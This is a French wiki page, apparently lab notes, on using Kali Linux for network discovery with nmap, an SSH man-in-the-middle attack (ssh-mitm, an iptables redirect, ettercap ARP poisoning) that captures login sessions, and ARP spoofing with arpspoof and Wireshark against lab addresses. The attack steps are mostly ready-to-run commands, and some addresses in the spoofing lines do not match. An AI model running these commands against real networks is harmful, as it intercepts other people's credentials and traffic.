Utilisation de Utilisation de Kali

De Travail-ivan

Utilisation de Kali[modifier | modifier le wikicode]

Découverte des hôtes et services présents sur un réseau local[modifier | modifier le wikicode]

En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :

Réaliser un scan du réseau[modifier | modifier le wikicode]

sudo nmap -sP 192.168.56.0/24

Scanner un hôtes[modifier | modifier le wikicode]

Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés

sudo nmap -sV 192.168.56.10

Faire Attaque MITM d’un service SSH[modifier | modifier le wikicode]

Se déplacer dans le répertoire ssh-mitm

cd ssh-mitm

lancer le service ssh-mitm

sudo ./start.sh

activer le routage

sudo sysctl -w net.ipv4.ip_forward=1

Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Lancer attaque avec la commande ettercap

sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//

• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes

Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.

arrêter le service ssh-mitm :

sudo ./stop.sh

Aller chercher les information de connexion avec la commande suivante :

sudo nano /home/ssh-mitm/shell_session_0.txt


Faire une Attaque ARP spoofing[modifier | modifier le wikicode]

Mise en œuvre de l’attaque[modifier | modifier le wikicode]

Outils à utiliser sur le système attaquant ;

  • Wireshark permettant d’analyser les trames transitant par le système attaquant.
  • Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.

Installer le paquet dsniff

sudo apt install dsniff

activer le routage

L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :

sudo sysctl -w net.ipv4.conf.all.forwarding=1

Vérifier que le paramètre “forwarding” est bien positionné :

sudo sysctl net.ipv4.conf.all.forwarding

la commande doit retourner la valeur 1


Mener l’attaque d’ARP spoofing sur l’utilisateur et la gateway[modifier | modifier le wikicode]

Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :

Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface d’écoute, dans l’exemple l’interface est « eth0 »:

sudo wireshark -ki eth0

Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :

sudo arpspoof -t 192.168.56.10 192.168.10.254
sudo arpspoof -t 192.168.56.254 192.168.10.10

Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.


Maintenant via wiresharp vous voyer toutes les trames qui transites entre le routeur et l'utilisateur.